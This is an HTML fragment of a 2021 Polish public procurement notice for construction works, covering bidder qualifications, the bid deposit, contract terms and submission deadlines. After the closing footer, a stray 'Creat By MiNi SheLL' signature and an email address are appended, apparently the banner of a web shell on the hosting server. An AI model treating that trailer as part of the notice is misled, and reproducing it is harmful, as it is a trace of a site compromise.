class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Określenie warunków udziału w postępowaniu - 1. Zdolność techniczna lub zawodowa:<br/>Wykonawca winien dysponować przy realizacji zamówienia osobami:<br/>a) kierownikiem budowy: osobą posiadającą uprawnienia budowlane do kierowania robotami<br/>budowlanymi w specjalności konstrukcyjno - budowlanej,<br/>b) kierownikiem robót: osobą posiadającą uprawnienia budowlane do kierowania robotami<br/>budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,<br/>wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,<br/>c) kierownikiem robót: osobą posiadającą uprawnienia budowlane do kierowania robotami<br/>budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych. <br/>Zamawiający jako spełnienie warunku dopuszcza wykazanie tej samej osoby na stanowiska<br/>wymienione pod lit a) – c) pod warunkiem posiadania przez daną osobę uprawnień do pełnienia<br/>funkcji w wymaganym zakresie i w wymaganych specjalnościach.<br/>Zamawiający dopuszcza uprawnienia budowlane odpowiadające ww. uprawnieniom, które<br/>zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>W przypadku wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w<br/>innych państwach, na zasadach określonych w art.12a ustawy z dnia 7 lipca 1994r. Prawo<br/>budowlane, z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.<br/>U. z 2018 r. poz. 2272). 2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których<br/>te zdolności są wymagane. 3. W przypadku, o którym mowa w ust. 2 powyżej, wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia (np. konsorcjum, spółka cywilna) dołączają do<br/>oferty oświadczenie zgodnie z art. 117 ust 4 ustawy Pzp, z którego będzie wynikało, które usługi<br/>wykonają poszczególni wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie<br/>niepodlegania wykluczeniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający na potwierdzenie spełniania warunków udziału w<br/>postępowaniu wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych<br/>środków dowodowych, aktualnych na dzień złożenia:<br/>- potwierdzających spełnianie przez wykonawcę warunków udziału w postępowaniu dotyczących<br/>zdolności technicznej lub zawodowej<br/>1) Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami z wykorzystaniem<br/>wzoru wykazu stanowiącego zał. nr 20 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Na ofertę składają się dokumenty wymienione poniżej:<br/>1) Wypełniony formularz „OFERTA”, który należy sporządzić ściśle wg wzoru formularza<br/>stanowiącego zał. nr 16 do SWZ. Formularz musi być podpisany przez osobę/osoby uprawnione<br/>do składania oświadczeń woli w zakresie praw i obowiązków majątkowych wykonawcy,<br/>2) Oświadczenie z art. 125 ust. 1 w związku z art. 273 ust. 2 ustawy Pzp o niepodleganiu<br/>wykluczeniu oraz spełnianiu warunków udziału w postępowaniu z wykorzystaniem wzoru<br/>formularza stanowiącego zał. nr 17 do SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, składa<br/>każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu.<br/>Wykonawca, w przypadku polegania na zdolnościach podmiotów udostępniających zasoby,<br/>przedstawia także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak<br/>podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w<br/>postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>3) Jeżeli dotyczy - Pełnomocnictwa dla osób podpisujących ofertę do reprezentowania w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego w imieniu wykonawcy lub wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, o ile nie wynikają z przepisów prawa lub innych<br/>dokumentów.<br/>4) Jeżeli dotyczy - Wykonawca, który na podstawie art. 118 ustawy Pzp, w celu potwierdzenia<br/>spełniania warunków udziału w postępowaniu, polega na zdolnościach technicznych lub<br/>zawodowych podmiotów udostępniających zasoby, składa wraz z ofertą zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca<br/>realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Wykonawca<br/>może wykorzystać wzór zobowiązania podmiotu udostępniającego zasoby stanowiący zał. nr 18<br/>do SWZ.5) Jeżeli dotyczy - W przypadku, o którym mowa w art. 117 ust. 3 ustawy Pzp (treść art.<br/>określona w ust. 9.4. SWZ), wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np.<br/>konsorcjum, spółka cywilna) dołączą do oferty oświadczenie określone w art.117 ust. 4 ustawy<br/>Pzp, z którego będzie wynikało, które usługi wykonają poszczególni wykonawcy. Wykonawca<br/>może wykorzystać wzór formularza stanowiący zał. nr 19 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1) Oferta musi być zabezpieczona wadium w wysokości 3 000,00 zł (słownie zł: trzy tysiące<br/>00/100).<br/>2) Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2<br/>i 3 oraz ust. 2 ustawy Pzp.<br/>3) Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących<br/>formach:<br/>- pieniądzu,<br/>- gwarancjach bankowych,<br/>- gwarancjach ubezpieczeniowych,<br/>- poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt.2 ustawy z dnia 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020, poz.<br/>299).<br/>Zamawiający poza formami wnoszenia wadium ww. nie dopuszcza innych form jego wnoszenia.<br/>Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>zamawiającego: Nr 59 2030 0045 1110 0000 0160 8370<br/>W przypadku wnoszenia wadium w formie pieniężnej za termin wniesienia wadium przyjmuje się<br/>datę uznania rachunku Zamawiającego.<br/>Wadium w formie innej niż pieniężna należy wnieść w formie oryginału, w postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku, gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia (np.<br/>konsorcjum), do oferty należy dołączyć pełnomocnictwo w którym wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia umocowali jeden podmiot do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego (zgodnie z art. 58 ust. 2 ustawy Pzp). 2. W<br/>przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie z art. 125<br/>ust. 1 w związku z art. 273 ust. 2 ustawy Pzp o niepodleganiu wykluczeniu oraz spełnianiu<br/>warunków udziału w postępowaniu, składa każdy z wykonawców. Oświadczenia te potwierdzają<br/>brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w<br/>jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. 3. W<br/>przypadku, o którym mowa w art. 117 ust. 3 ustawy Pzp (treść art. określona w ust. 9.4. SWZ),<br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. konsorcjum, spółka cywilna)<br/>dołączą do oferty oświadczenie określone w art.117 ust. 4 ustawy Pzp, z którego będzie wynikało, które usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy oraz określenie rodzaju i zakresu zmian opisane zostały w projektowanych<br/>postanowieniach umowy - wzorze umowy, stanowiącym zał. nr 15 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-26 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/494370</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-26 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-24</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-11 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com